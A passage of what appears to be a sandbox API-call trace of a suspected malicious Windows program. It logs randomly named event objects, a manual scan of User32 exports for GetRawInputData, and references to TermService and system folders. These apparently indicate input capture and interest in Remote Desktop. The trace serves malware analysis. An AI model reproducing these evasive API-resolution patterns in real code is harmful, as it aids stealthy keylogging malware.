lpString2="V2XmAUG09c" | out: lpString1="V2XmAUG09c") returned="V2XmAUG09c" [0267.719] VirtualFree (lpAddress=0xa30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.720] lstrlenA (lpString="V2XmAUG09c") returned 10 [0267.720] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0xa30000 [0267.721] lstrcatA (in: lpString1="", lpString2="V2XmAUG09c" | out: lpString1="V2XmAUG09c") returned="V2XmAUG09c" [0267.721] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="V2XmAUG09c") returned 0x274 [0267.721] VirtualFree (lpAddress=0x2300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.721] lstrlenA (lpString="Ww9ebAUmBK") returned 10 [0267.721] lstrlenA (lpString="Ww9ebAUmBK") returned 10 [0267.721] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2300000 [0267.722] lstrcpyA (in: lpString1=0x2300000, lpString2="Ww9ebAUmBK" | out: lpString1="Ww9ebAUmBK") returned="Ww9ebAUmBK" [0267.722] VirtualFree (lpAddress=0xa40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.722] lstrlenA (lpString="Ww9ebAUmBK") returned 10 [0267.722] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0xa40000 [0267.723] lstrcatA (in: lpString1="", lpString2="Ww9ebAUmBK" | out: lpString1="Ww9ebAUmBK") returned="Ww9ebAUmBK" [0267.723] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="Ww9ebAUmBK") returned 0x278 [0267.723] VirtualFree (lpAddress=0x2300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.723] lstrlenA (lpString="2i8W1qi2Vu") returned 10 [0267.723] lstrlenA (lpString="2i8W1qi2Vu") returned 10 [0267.723] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2300000 [0267.724] lstrcpyA (in: lpString1=0x2300000, lpString2="2i8W1qi2Vu" | out: lpString1="2i8W1qi2Vu") returned="2i8W1qi2Vu" [0267.724] VirtualFree (lpAddress=0xa50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.725] lstrlenA (lpString="2i8W1qi2Vu") returned 10 [0267.725] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0xa50000 [0267.725] lstrcatA (in: lpString1="", lpString2="2i8W1qi2Vu" | out: lpString1="2i8W1qi2Vu") returned="2i8W1qi2Vu" [0267.725] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="2i8W1qi2Vu") returned 0x27c [0267.725] VirtualFree (lpAddress=0x2300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.726] lstrlenA (lpString="ZmS69ewWqU") returned 10 [0267.726] lstrlenA (lpString="ZmS69ewWqU") returned 10 [0267.726] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2300000 [0267.726] lstrcpyA (in: lpString1=0x2300000, lpString2="ZmS69ewWqU" | out: lpString1="ZmS69ewWqU") returned="ZmS69ewWqU" [0267.726] VirtualFree (lpAddress=0x22f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.727] lstrlenA (lpString="ZmS69ewWqU") returned 10 [0267.727] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x22f0000 [0267.727] lstrcatA (in: lpString1="", lpString2="ZmS69ewWqU" | out: lpString1="ZmS69ewWqU") returned="ZmS69ewWqU" [0267.727] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="ZmS69ewWqU") returned 0x280 [0267.727] VirtualFree (lpAddress=0x2300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.728] GetProcessHeap () returned 0x710000 [0267.728] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x54) returned 0x7221a0 [0267.729] GetProcessHeap () returned 0x710000 [0267.729] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x7c) returned 0x722200 [0267.729] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x284 [0267.729] LoadLibraryW (lpLibFileName="User32.dll") returned 0x756d0000 [0267.729] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="GetRawInputData") returned -1 [0267.734] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="GetRawInputData") returned -1 [0267.734] lstrcmpA (lpString1="AdjustWindowRect", lpString2="GetRawInputData") returned -1 [0267.734] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="GetRawInputData") returned -1 [0267.734] lstrcmpA (lpString1="AlignRects", lpString2="GetRawInputData") returned -1 [0267.734] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="GetRawInputData") returned -1 [0267.734] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="GetRawInputData") returned -1 [0267.734] lstrcmpA (lpString1="AnimateWindow", lpString2="GetRawInputData") returned -1 [0267.734] lstrcmpA (lpString1="AnyPopup", lpString2="GetRawInputData") returned -1 [0267.734] lstrcmpA (lpString1="AppendMenuA", lpString2="GetRawInputData") returned -1 [0267.734] lstrcmpA (lpString1="AppendMenuW", lpString2="GetRawInputData") returned -1 [0267.734] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="GetRawInputData") returned -1 [0267.734] lstrcmpA (lpString1="AttachThreadInput", lpString2="GetRawInputData") returned -1 [0267.734] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="GetRawInputData") returned -1 [0267.734] lstrcmpA (lpString1="BeginPaint", lpString2="GetRawInputData") returned -1 [0267.734] lstrcmpA (lpString1="BlockInput", lpString2="GetRawInputData") returned -1 [0267.734] lstrcmpA (lpString1="BringWindowToTop", lpString2="GetRawInputData") returned -1 [0267.734] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="GetRawInputData") returned -1 [0267.734] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="GetRawInputData") returned -1 [0267.734] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="GetRawInputData") returned -1 [0267.734] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="GetRawInputData") returned -1 [0267.734] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="GetRawInputData") returned -1 [0267.734] lstrcmpA (lpString1="BuildReasonArray", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="CalcMenuBar", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="CalculatePopupWindowPosition", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="CallMsgFilter", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="CallMsgFilterA", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="CallMsgFilterW", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="CallNextHookEx", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="CallWindowProcA", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="CallWindowProcW", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="CancelShutdown", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="CascadeChildWindows", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="CascadeWindows", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="ChangeClipboardChain", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="ChangeDisplaySettingsA", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="ChangeDisplaySettingsExA", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="ChangeDisplaySettingsExW", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="ChangeDisplaySettingsW", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="ChangeMenuA", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="ChangeMenuW", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="ChangeWindowMessageFilter", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="ChangeWindowMessageFilterEx", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="CharLowerA", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="CharLowerBuffA", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="CharLowerBuffW", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="CharLowerW", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="CharNextA", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="CharNextExA", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="CharNextW", lpString2="GetRawInputData") returned -1 [0267.735] lstrcmpA (lpString1="CharPrevA", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="CharPrevExA", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="CharPrevW", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="CharToOemA", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="CharToOemBuffA", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="CharToOemBuffW", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="CharToOemW", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="CharUpperA", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="CharUpperBuffA", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="CharUpperBuffW", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="CharUpperW", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="CheckDBCSEnabledExt", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="CheckDlgButton", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="CheckMenuItem", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="CheckMenuRadioItem", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="CheckProcessForClipboardAccess", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="CheckProcessSession", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="CheckRadioButton", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="CheckWindowThreadDesktop", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="ChildWindowFromPoint", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="ChildWindowFromPointEx", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="CliImmSetHotKey", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="ClientThreadSetup", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="ClientToScreen", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="ClipCursor", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="CloseClipboard", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="CloseDesktop", lpString2="GetRawInputData") returned -1 [0267.736] lstrcmpA (lpString1="CloseGestureInfoHandle", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CloseTouchInputHandle", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CloseWindow", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CloseWindowStation", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="ConsoleControl", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="ControlMagnification", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CopyAcceleratorTableA", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CopyAcceleratorTableW", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CopyIcon", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CopyImage", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CopyRect", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CountClipboardFormats", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CreateAcceleratorTableA", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CreateAcceleratorTableW", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CreateCaret", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CreateCursor", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CreateDCompositionHwndTarget", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CreateDesktopA", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CreateDesktopExA", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CreateDesktopExW", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CreateDesktopW", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CreateDialogIndirectParamA", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CreateDialogIndirectParamAorW", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CreateDialogIndirectParamW", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CreateDialogParamA", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CreateDialogParamW", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CreateIcon", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CreateIconFromResource", lpString2="GetRawInputData") returned -1 [0267.737] lstrcmpA (lpString1="CreateIconFromResourceEx", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="CreateIconIndirect", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="CreateMDIWindowA", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="CreateMDIWindowW", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="CreateMenu", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="CreatePopupMenu", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="CreateSystemThreads", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="CreateWindowExA", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="CreateWindowExW", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="CreateWindowInBand", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="CreateWindowInBandEx", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="CreateWindowIndirect", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="CreateWindowStationA", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="CreateWindowStationW", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="CsrBroadcastSystemMessageExW", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="CtxInitUser32", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="DdeAbandonTransaction", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="DdeAccessData", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="DdeAddData", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="DdeClientTransaction", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="DdeCmpStringHandles", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="DdeConnect", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="DdeConnectList", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="DdeCreateDataHandle", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="DdeCreateStringHandleA", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="DdeCreateStringHandleW", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="DdeDisconnect", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="DdeDisconnectList", lpString2="GetRawInputData") returned -1 [0267.738] lstrcmpA (lpString1="DdeEnableCallback", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DdeFreeDataHandle", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DdeFreeStringHandle", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DdeGetData", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DdeGetLastError", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DdeGetQualityOfService", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DdeImpersonateClient", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DdeInitializeA", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DdeInitializeW", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DdeKeepStringHandle", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DdeNameService", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DdePostAdvise", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DdeQueryConvInfo", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DdeQueryNextServer", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DdeQueryStringA", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DdeQueryStringW", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DdeReconnect", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DdeSetQualityOfService", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DdeSetUserHandle", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DdeUnaccessData", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DdeUninitialize", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DefDlgProcA", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DefDlgProcW", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DefFrameProcA", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DefFrameProcW", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DefMDIChildProcA", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DefMDIChildProcW", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DefRawInputProc", lpString2="GetRawInputData") returned -1 [0267.739] lstrcmpA (lpString1="DefWindowProcA", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DefWindowProcW", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DeferWindowPos", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DeferWindowPosAndBand", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DeleteMenu", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DeregisterShellHookWindow", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DestroyAcceleratorTable", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DestroyCaret", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DestroyCursor", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DestroyDCompositionHwndTarget", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DestroyIcon", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DestroyMenu", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DestroyReasons", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DestroyWindow", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DialogBoxIndirectParamA", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DialogBoxIndirectParamAorW", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DialogBoxIndirectParamW", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DialogBoxParamA", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DialogBoxParamW", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DisableProcessWindowsGhosting", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DispatchMessageA", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DispatchMessageW", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DisplayConfigGetDeviceInfo", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DisplayConfigSetDeviceInfo", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DisplayExitWindowsWarnings", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DlgDirListA", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DlgDirListComboBoxA", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DlgDirListComboBoxW", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DlgDirListW", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DlgDirSelectComboBoxExA", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DlgDirSelectComboBoxExW", lpString2="GetRawInputData") returned -1 [0267.740] lstrcmpA (lpString1="DlgDirSelectExA", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DlgDirSelectExW", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DoSoundConnect", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DoSoundDisconnect", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DragDetect", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DragObject", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DrawAnimatedRects", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DrawCaption", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DrawCaptionTempA", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DrawCaptionTempW", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DrawEdge", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DrawFocusRect", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DrawFrame", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DrawFrameControl", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DrawIcon", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DrawIconEx", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DrawMenuBar", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DrawMenuBarTemp", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DrawStateA", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DrawStateW", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DrawTextA", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DrawTextExA", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DrawTextExW", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DrawTextW", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DwmGetDxSharedSurface", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DwmGetRemoteSessionOcclusionEvent", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DwmGetRemoteSessionOcclusionState", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DwmKernelShutdown", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DwmKernelStartup", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DwmLockScreenUpdates", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="DwmValidateWindow", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="EditWndProc", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="EmptyClipboard", lpString2="GetRawInputData") returned -1 [0267.741] lstrcmpA (lpString1="EnableChildWindowDpiMessage", lpString2="GetRawInputData") returned -1 [0267.742] lstrcmpA (lpString1="EnableMenuItem", lpString2="GetRawInputData") returned -1 [0267.742] lstrcmpA (lpString1="EnableMouseInPointer", lpString2="GetRawInputData") returned -1 [0267.742] lstrcmpA (lpString1="EnableScrollBar", lpString2="GetRawInputData") returned -1 [0267.742] lstrcmpA (lpString1="EnableSessionForMMCSS", lpString2="GetRawInputData") returned -1 [0267.742] lstrcmpA (lpString1="EnableWindow", lpString2="GetRawInputData") returned -1 [0267.742] lstrcmpA (lpString1="EndDeferWindowPos", lpString2="GetRawInputData") returned -1 [0267.742] lstrcmpA (lpString1="EndDeferWindowPosEx", lpString2="GetRawInputData") returned -1 [0267.742] lstrcmpA (lpString1="EndDialog", lpString2="GetRawInputData") returned -1 [0267.742] lstrcmpA (lpString1="EndMenu", lpString2="GetRawInputData") returned -1 [0267.742] lstrcmpA (lpString1="EndPaint", lpString2="GetRawInputData") returned -1 [0267.742] lstrcmpA (lpString1="EndTask", lpString2="GetRawInputData") returned -1 [0267.742] lstrcmpA (lpString1="EnterReaderModeHelper", lpString2="GetRawInputData") returned -1 [0267.742] lstrcmpA (lpString1="EnumChildWindows", lpString2="GetRawInputData") returned -1 [0267.742] lstrcmpA (lpString1="EnumClipboardFormats", lpString2="GetRawInputData") returned -1 [0267.742] lstrcmpA (lpString1="EnumDesktopWindows", lpString2="GetRawInputData") returned -1 [0267.742] lstrcmpA (lpString1="EnumDesktopsA", lpString2="GetRawInputData") returned -1 [0267.742] lstrcmpA (lpString1="EnumDesktopsW", lpString2="GetRawInputData") returned -1 [0267.742] lstrcmpA (lpString1="EnumDisplayDevicesA", lpString2="GetRawInputData") returned -1 [0267.742] lstrcmpA (lpString1="EnumDisplayDevicesW", lpString2="GetRawInputData") returned -1 [0267.742] lstrcmpA (lpString1="EnumDisplayMonitors", lpString2="GetRawInputData") returned -1 [0267.742] lstrcmpA (lpString1="EnumDisplaySettingsA", lpString2="GetRawInputData") returned -1 [0267.742] lstrcmpA (lpString1="EnumDisplaySettingsExA", lpString2="GetRawInputData") returned -1 [0267.742] lstrcmpA (lpString1="EnumDisplaySettingsExW", lpString2="GetRawInputData") returned -1 [0267.743] GetProcessHeap () returned 0x710000 [0267.743] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x18) returned 0x72b438 [0267.743] lstrlenW (lpString="TermService") returned 11 [0267.743] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2300000 [0267.743] lstrlenW (lpString="TermService") returned 11 [0267.744] lstrcpyW (in: lpString1=0x2300000, lpString2="TermService" | out: lpString1="TermService") returned="TermService" [0267.745] lstrlenW (lpString="TermService") returned 11 [0267.745] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0267.745] lstrcatW (in: lpString1="", lpString2="TermService" | out: lpString1="TermService") returned="TermService" [0267.745] VirtualFree (lpAddress=0x2300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.746] lstrlenW (lpString="%ProgramFiles%") returned 14 [0267.746] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x2300000 [0267.746] lstrlenW (lpString="%ProgramFiles%") returned 14 [0267.746] lstrcpyW (in: lpString1=0x2300000, lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0267.746] lstrlenW (lpString="%ProgramFiles%") returned 14 [0267.746] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0267.746] lstrcatW (in: lpString1="", lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0267.746] VirtualFree (lpAddress=0x2300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0267.747] lstrlenW (lpString="%windir%\\System32") returned 17 [0267.747] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x2300000 [0267.747] lstrlenW 